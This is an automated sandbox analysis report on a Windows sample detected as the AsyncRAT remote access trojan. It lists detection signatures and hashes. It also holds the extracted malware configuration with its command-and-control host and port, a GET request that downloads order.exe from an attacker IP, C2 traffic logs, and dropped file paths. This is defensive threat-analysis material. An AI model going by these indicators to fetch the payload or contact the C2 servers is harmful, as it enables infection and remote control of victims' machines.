Windows Analysis Report
rU6YAgkoAw.exe

Overview

General Information

Sample name: rU6YAgkoAw.exe
renamed because original name is a hash value
Original sample name: 1f2ec9232f191e28fa8d5fbcbfad3a4f.exe
Analysis ID: 1417077
MD5: 1f2ec9232f191e28fa8d5fbcbfad3a4f
SHA1: ee22f5b25185c5a6d37e16d3eb52f9515fd6964d
SHA256: b3b1a41903116bbc9fedd6403c9ad1976eefdcd50c322859f993a822b3bbac08
Tags: 32exetrojan
Infos:

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Drops large PE files
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Tries to load missing DLLs
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: rU6YAgkoAw.exe Avira: detected
Antivirus detection for URL or domain
Source: http://93.123.39.68/order.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\start.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Ports": ["1339"], "Server": ["leetboy.dynuddns.net"], "Mutex": "Exodus_Market", "Certificate": "MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhY+g1tekZ8/F29gsEIDgf/8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMw/Vwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51/SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXL/hXoE/wCzwzvU/CrzPXd3uMsLfFMDHZJ+OQ9OXKU/CHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3/ingNFaTyYmGsmLIE2Jq5AR1A+xA+FEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICt+J8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4/RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8+hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd/62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNt/CjnlaMc40DJ+HlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6/xZCPjr22V/xZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWT/nKuRvIEYU4Ra+B39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7/kVfIYuRxl+YefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWN/Fm+lzF3THeHU6vNJ+5UoAWHYFW8wfJCbzQ/0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckUL/lEf4Y92uJVKvLGruQt/mtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv+36kLKhgIJlqC7Xx/PVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV/3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWS/JykARBv9o2BjL/PTADfwAtc1b4nWo0l+CI8IjjYXu/mJOuwR+kFJ19INtwbffQvT9U12t4smpcZV+OK0opk4Yr9r1tZYm92ghXA==", "Server Signature": "F0xfEIJ635aPVzJ7TxUSC7Qq0Nvv0T62b4z7CBNsc9ph6RsbFVcdaGd7619j9z8vXELuNb6nAMNzxVh5zw431HAg8uxac4l65Js76iA5ua7oiXIZGJkyHmqqwsGIyAhRfW3MsonOqm07xD5N0vdfHey4r0Vncivg0lzclsA5ofF6Vyle+WewDOLGeL+PH3bGiw9F8dbBeBgH6rdzG7t0OHdgh/32iJ0W9BUzFgjiD7/KZV/QPYXp6Tbh4Mryl4lt9khPn2VmC2eApgyazrOKC5PRUCdNN2J/IPPN3z9F+7nIn/ILSg9vsh5nz/2Zm2/wZ7MqHWvJ9OwxPB1jIs4ojWX4YhQRQkiHSMSC/4aNkvrU+3rMVgLOeieTqhxXnI2G0+wE8pMh5N7fELuZ4oupmAo/Xvbvaaguc2KgGc42OFxAVDJE/pkCg4/wmytoKWH8IEMAd/41qAN22r4qtw95CqhVM6LI6Nqgz3MHHf3fMbkDAbPgOl2z+Hy/gYWl5SMamD6RVWFAC0gDcHpXzFMjzVv5LIuCdaHvFmlDuCUgnezy9oUmMMhEOtOINDtLBS7UoGjYGo2HtI54OJZIDUUHYaD3jIOFaVzq/18l0RKZo8mYWMHwKrdypWpZtd9an1cAHAHb8qmc5Jif/Xajgj4hvCTaGaOOo95NlNeawcWrm1M="}
Multi AV Scanner detection for domain / URL
Source: blue.o7lab.me Virustotal: Detection: 10% Perma Link
Source: leetboy.dynuddns.net Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: rU6YAgkoAw.exe ReversingLabs: Detection: 28%
Source: rU6YAgkoAw.exe Virustotal: Detection: 40% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\start.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: rU6YAgkoAw.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: rU6YAgkoAw.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user~1\AppData\Local\Temp\nspBED4.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\LICENSE.electron.txt Jump to behavior
Source: rU6YAgkoAw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Accessibility.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: App3FAAL98.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.pdbMZ source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Accessibility.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.pdb) source: WERBE36.tmp.dmp.22.dr
Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\App3FAAL98\obj\Release\App3FAAL98.pdb source: svchost (3).exe, 00000010.00000000.2293696073.000001C7CAF62000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: Accessibility.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.pdb` source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Configuration.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.pdba@( source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBE36.tmp.dmp.22.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Windows.Forms.pdbp source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Drawing.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: mscorlib.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: vk_swiftshader.dll.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERBE36.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBE36.tmp.dmp.22.dr
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\resources
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: leetboy.dynuddns.net
Yara detected Generic Downloader
Source: Yara match File source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49714 -> 94.156.66.112:4449
Source: global traffic TCP traffic: 192.168.2.7:49725 -> 185.196.11.223:1339
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 14:34:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 28 Mar 2024 13:15:33 GMTETag: "3f2a800-614b85171a80a"Accept-Ranges: bytesContent-Length: 66234368Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 06 00 00 08 00 00 00 9c f2 03 00 00 00 00 ad 14 00 00 00 10 00 00 00 c0 f2 03 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 f2 03 00 04 00 00 16 45 f3 03 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 b4 f2 03 50 00 00 00 00 d0 f2 03 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 b4 f2 03 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 83 96 f2 03 00 20 00 00 00 98 f2 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 04 00 00 00 00 c0 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 f8 02 00 00 00 d0 f2 03 00 04 00 00 00 a4 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /order.exe HTTP/1.1Host: 93.123.39.68Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.39.68
Source: global traffic HTTP traffic detected: GET /order.exe HTTP/1.1Host: 93.123.39.68Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: blue.o7lab.me
Source: build.exe, 00000015.00000000.2317822657.000000000040A000.00000008.00000001.01000000.0000000D.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: start.exe, 00000017.00000002.2376656529.0000000003004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.22.dr String found in binary or memory: http://upx.sf.net
Source: icudtl.dat.21.dr String found in binary or memory: http://www.unicode.org/copyright.html
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://alekberg.net/privacy
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: ca.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u
Source: ca.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore?hl=caS
Source: el.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore?hl=el
Source: el.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore?hl=el&category=theme81https://myactivity.google.com/myactivity/?u
Source: sw.pak.21.dr String found in binary or memory: https://chrome.google.com/webstore?hl=swUmeondoa
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://chromium.dns.nextdns.io
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://cleanbrowsing.org/privacy
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns.google/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns.quad9.net/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns.sb/privacy/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns10.quad9.net/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns11.quad9.net/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dns64.dns.google/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.cox.net/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.dns.sb/dns-query
